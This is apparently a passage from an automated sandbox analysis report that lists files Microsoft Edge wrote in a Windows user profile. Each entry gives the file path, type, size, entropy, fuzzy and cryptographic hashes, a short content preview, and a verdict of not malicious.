                                                                                                                                                                Preview:2025/01/09-08:42:28.128 1dec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/09-08:42:28.130 1dec Recovering log #3.2025/01/09-08:42:28.130 1dec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):334
                                                                                                                                                                Entropy (8bit):5.190938817272335
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvRkH0FN+q2PcNwi23oH+TcwtpIFUtJvRPeAWZmwPvRPe3VkwOcNwi23oH+TcM:7SUFN+vLZYebmFUtPPW/NKV54ZYebaUJ
                                                                                                                                                                MD5:084F19BEDD3828AD9553BA13B1694B6E
                                                                                                                                                                SHA1:84DDDA91D9DA175A832B31FA059014E027BA02B5
                                                                                                                                                                SHA-256:F18FFDC95FB0FDFA6BCD154E0BE06A7F3C9B17B87ECE685E1D8DB408A6611524
                                                                                                                                                                SHA-512:A57FC1AC430D7F8DFD3886AD2CBA71E93092D12920905CC865F53EEC5778613A0FD3C2B4F34F2CF191D52F9C887105FF1D1A2490C45B482F30E935CEAAC03020
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:28.128 1dec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/09-08:42:28.130 1dec Recovering log #3.2025/01/09-08:42:28.130 1dec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):196608
                                                                                                                                                                Entropy (8bit):1.2652848714957459
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:KrJ/2qOB1nxCkMdSAELyKOMq+8HKkjucswRv8p3nVumJ:K0q+n0Jd9ELyKOMq+8HKkjuczRv89F
                                                                                                                                                                MD5:A43BFC1C69B4D660F978F13FED603AB8
                                                                                                                                                                SHA1:FF23E244A7D1C20BBC7EE6AEB87424EB871F4CF7
                                                                                                                                                                SHA-256:9387611919CF800DDDBC4CA7465CF9C5E1DD9A5B3D4E73F5A464026012F6EDBE
                                                                                                                                                                SHA-512:DE5C958CDD55FD7FD7CC5E41296D2FE45EEB5F08E6C0F46EE090C25D771B1E5BB35428D34F34A731413B7CA1A628685100A7D8EB5D5ACE4D2D6FED7E0D526839
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                Entropy (8bit):0.46670540393918675
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0L/KQIV:v7doKsKuKZKlZNmu46yjx0LDIV
                                                                                                                                                                MD5:EB34B1AA4B89DC26D5C087F53534746D
                                                                                                                                                                SHA1:E93A4B1314F1C3B33BDED50273805DE54EAD77DE
                                                                                                                                                                SHA-256:2926AE68CD5BC1DCAB5609C13396889BCBE6F314CCB05BED5768281A03AEE984
                                                                                                                                                                SHA-512:C79FD4953FB5AB465D5AB37DC9E37870263D1C5426C4783FEF560732CE4F3017ABC6F77788DC731B64E6EF6B8FF2834E72CD9941D5CE9797A5474715B0D13FD0
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):11755
                                                                                                                                                                Entropy (8bit):5.190465908239046
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\c57d53c3-d7c4-4949-972c-3d4b10df93a3.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):13579
                                                                                                                                                                Entropy (8bit):5.2294340074227135
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:st/J99QTryDigabatSuypBsHsHyaNP9kpSYCBKs8IbV+FmWQwW9ZPoYJ:st/PGKSu4BsMHtJ7bGnQwI
                                                                                                                                                                MD5:8CFF09EAA1EE613FDE28851350D9577B
                                                                                                                                                                SHA1:E95C2F3DE45FD2EEF8DB9FB37C84631CD971E999
                                                                                                                                                                SHA-256:1B209DFBC00A17350B5253337E8D975D5F21065A955325279ECB4F9D8341C052
                                                                                                                                                                SHA-512:8A2FADED12FE3F1E38E65039B647C13BD40ACDDA214E9BE8E5228EA401A6EA642A7FF8CE06BEAF66D8A2A617C0C8AFE67BA5558162EB4ACD54030B55DA249DAE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380903748641376","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                Entropy (8bit):0.3410017321959524
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\e231cc37-db8e-44d6-9a8f-12242b29f7cd.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):115717
                                                                                                                                                                Entropy (8bit):5.183660917461099
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\e59c0e9f-b4b7-498d-a0f0-635f3eacd12e.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (16793), with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16793
                                                                                                                                                                Entropy (8bit):5.446679933619079
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:st/J99QTryDigabatSuypBsHsHyaNP9kcYCBAXx3uaqBp0B12s8IbV+FmWQwW9Z5:st/PGKSu4BsMHtJ4XpXqBpYXbGnQwI
                                                                                                                                                                MD5:EEC801F7A31803E706A89A32B9A362F9
                                                                                                                                                                SHA1:7E7AB3A8B5FFA3BB0F3D9D31580C7C9AF25FFA54
                                                                                                                                                                SHA-256:0EA84E86972E2D60BBB4FF9208ED1AF7DC9E30AF2D5F898FCF1700A7BEDF0B41
                                                                                                                                                                SHA-512:CF71D8EE4E772A5CF29ED8EB8552D0450DD17EEC7A0A82FD8FA05FFD0822E736F0494A9928BFF8C81BF94C9553FFF9AD0E5B8A34838C7D86DF6E57D96549489A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380903748641376","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ed72efde-d385-44c8-8809-788668111f4d.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (17550), with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):17550
                                                                                                                                                                Entropy (8bit):5.483187850962429
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:st/PGKSu4BsMHtJjdGXpXqBpYXbGnQwiK:sROxueHxopBbGQg
                                                                                                                                                                MD5:71494FB2660D70EA2CAFF9065FBC2863
                                                                                                                                                                SHA1:7F24EB325E90D91137808B4347ABEF43D3F2C205
                                                                                                                                                                SHA-256:A205166C7E50E61F2B578211D9C2608477C21417A61F072F529C1470FA480D85
                                                                                                                                                                SHA-512:17F00CA8D928C0C00D79EB4A5C408AC3CC4BDD63F52EE66DC3770453E651CBD19FB6FB9E2A0D9FBE1E3146017D160F541D747EF928372A712E3327E6AFCA0EE5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380903748641376","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                Entropy (8bit):0.10246804483081562
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:Gu0glBsQtu0glBsx89XCChslotGLNl0ml/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl0:+p4pxspEjVl/PnnnnnnnnnnnvoQ/Eou
                                                                                                                                                                MD5:F91873781862CA71C3AF533492E21DAE
                                                                                                                                                                SHA1:A7115C83CB76867159479E78CA58B88B77EE5025
                                                                                                                                                                SHA-256:FE47C4F9D735ACB036B995CAB0D74E0082C26121901D512138DE5D3D875DA9B8
                                                                                                                                                                SHA-512:47DC3AB030EF76B39596B02783512ADB405EB8B7360B87F9449ADB0152A3F5DEBADBAFB84303451A4B5965C1508A2A23CEA5B48603A302E1D9B43BBD49528745
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:..-.............M........B._8:..3.-.....p.`0..B...-.............M........B._8:..3.-.....p.`0..B.........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):317272
                                                                                                                                                                Entropy (8bit):0.8887125838325957
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:YfVVoWG3iVIyOaHyNHXE6AP1EDv87yKyh/y5yubyjxy3s:qVed
                                                                                                                                                                MD5:1740E4D9C2CCFEDCE66E287DB7B5CC2F
                                                                                                                                                                SHA1:64358E8CDBB5652B3AAEC1BC4BDC4009E2CA95A1
                                                                                                                                                                SHA-256:C077677DB554207C8D63FCF7D63387A6FA85E6BF37875708FFF53F25944D043B
                                                                                                                                                                SHA-512:6C6CFE7B9FEBFC6216A4CF211072CEF691F633BCDCDD26D2620DF58F54CA8FC993B520360BFBE7AF30319F812DF8435FBC4955B7AE0FE1E1DA1F6FBE951C188A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:7....-..........3.-.......F`..........3.-......+..O.\SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):419
                                                                                                                                                                Entropy (8bit):3.6916294183852694
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:/XntM+dl3sedhOmOuuuuuuuuuuuuGBsedhOm:llc8BOuuuuuuuuuuuub8n
                                                                                                                                                                MD5:D19B25F7708AC9F672687B3D7C9A0752
                                                                                                                                                                SHA1:7D69F899E226548F59CE6CF16748D7608083C1E2
                                                                                                                                                                SHA-256:F84FBD78D66B2BE1036CB3154591C7819CBED2500FF41F4743D7B2A72BC0F505
                                                                                                                                                                SHA-512:19F233052BBFB1AED28B70B60E8AE6FF938DA07A64502CEC3808CA66C80FD4C0BA50DFBE3B4FA14C7C90715DE4E82F180E75A4CA65799A9E5C84EA57E279882A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:A..r.................20_1_1...1.,U.................20_1_1...1...0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=................5L=0................39_config..........6.....n ....1

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):327
                                                                                                                                                                Entropy (8bit):5.241914114446308
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvRIYVq2PcNwi23oH+TcwtfrK+IFUtJvRygZmwPvRyIkwOcNwi23oH+TcwtfrF:7eAvLZYeb23FUt3//54ZYeb3J
                                                                                                                                                                MD5:8F8A707F5323738B8D8DEA5C1909C8CD
                                                                                                                                                                SHA1:82197085FFB478C47C406A7E23DF2BBE5C97704C
                                                                                                                                                                SHA-256:4AF8FF0B5CFA890E30D938AD4B3887710EBDD2B256A11F0C69FE1A1F4BAA4AD0
                                                                                                                                                                SHA-512:9C9553743AD5B8FD63BD29E99714904DE8808D7ECB54E98FB958658DE7C428A5888A71C91C7CCCAE6028AAD9EDD57EA7F8D4F708F90B52ACF587BEBCED3D19C1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:28.647 680 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/01/09-08:42:28.648 680 Recovering log #3.2025/01/09-08:42:28.648 680 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):327
                                                                                                                                                                Entropy (8bit):5.241914114446308
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvRIYVq2PcNwi23oH+TcwtfrK+IFUtJvRygZmwPvRyIkwOcNwi23oH+TcwtfrF:7eAvLZYeb23FUt3//54ZYeb3J
                                                                                                                                                                MD5:8F8A707F5323738B8D8DEA5C1909C8CD
                                                                                                                                                                SHA1:82197085FFB478C47C406A7E23DF2BBE5C97704C
                                                                                                                                                                SHA-256:4AF8FF0B5CFA890E30D938AD4B3887710EBDD2B256A11F0C69FE1A1F4BAA4AD0
                                                                                                                                                                SHA-512:9C9553743AD5B8FD63BD29E99714904DE8808D7ECB54E98FB958658DE7C428A5888A71C91C7CCCAE6028AAD9EDD57EA7F8D4F708F90B52ACF587BEBCED3D19C1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:28.647 680 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/01/09-08:42:28.648 680 Recovering log #3.2025/01/09-08:42:28.648 680 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):782
                                                                                                                                                                Entropy (8bit):4.049291162962452
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ys:G0nYUtypD32m3yWlIZMBA5NgKIvB8s
                                                                                                                                                                MD5:FDF465758A7489458B387EB41C7D42B0
                                                                                                                                                                SHA1:9509283CF1BD7397790091C5A7580CBA353A1143
                                                                                                                                                                SHA-256:C5A7592A847D101DCB71AEE0A234835548121C647E6D99EF794337823A347703
                                                                                                                                                                SHA-512:9E40B768990B3FAC6960274C5C78F9B86585100DBFE92BC885FC5384937F2922C3ED435B44C42DEAC138E8FB22CD1EED865DBB984CFFDAE8ED0BE96EDADA1698
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):345
                                                                                                                                                                Entropy (8bit):5.22197671452259
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvR2Vq2PcNwi23oH+TcwtfrzAdIFUtJvR+wgZmwPvR+wIkwOcNwi23oH+TcwtS:7EvLZYeb9FUta/w54ZYeb2J
                                                                                                                                                                MD5:22565D9EDBBF4FF82330C8B42D2F4D8F
                                                                                                                                                                SHA1:935445FC744CFC3A51B59F1DFC4ED614190D1B04
                                                                                                                                                                SHA-256:8216241F8D34A04FDDD5589CEAA16AAE9C440140BBDEE4BCC600816BF9D93525
                                                                                                                                                                SHA-512:51E3A84DB8BA688E1FC3957CF9B9E1600410F4B2C2F88D21957FDDC69C846FCF6B416853FD6019D411607D80DC4324720C66BE8DED256BB121089884073AD779
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:28.644 680 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/01/09-08:42:28.645 680 Recovering log #3.2025/01/09-08:42:28.645 680 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):345
                                                                                                                                                                Entropy (8bit):5.22197671452259
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvR2Vq2PcNwi23oH+TcwtfrzAdIFUtJvR+wgZmwPvR+wIkwOcNwi23oH+TcwtS:7EvLZYeb9FUta/w54ZYeb2J
                                                                                                                                                                MD5:22565D9EDBBF4FF82330C8B42D2F4D8F
                                                                                                                                                                SHA1:935445FC744CFC3A51B59F1DFC4ED614190D1B04
                                                                                                                                                                SHA-256:8216241F8D34A04FDDD5589CEAA16AAE9C440140BBDEE4BCC600816BF9D93525
                                                                                                                                                                SHA-512:51E3A84DB8BA688E1FC3957CF9B9E1600410F4B2C2F88D21957FDDC69C846FCF6B416853FD6019D411607D80DC4324720C66BE8DED256BB121089884073AD779
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:28.644 680 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/01/09-08:42:28.645 680 Recovering log #3.2025/01/09-08:42:28.645 680 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):120
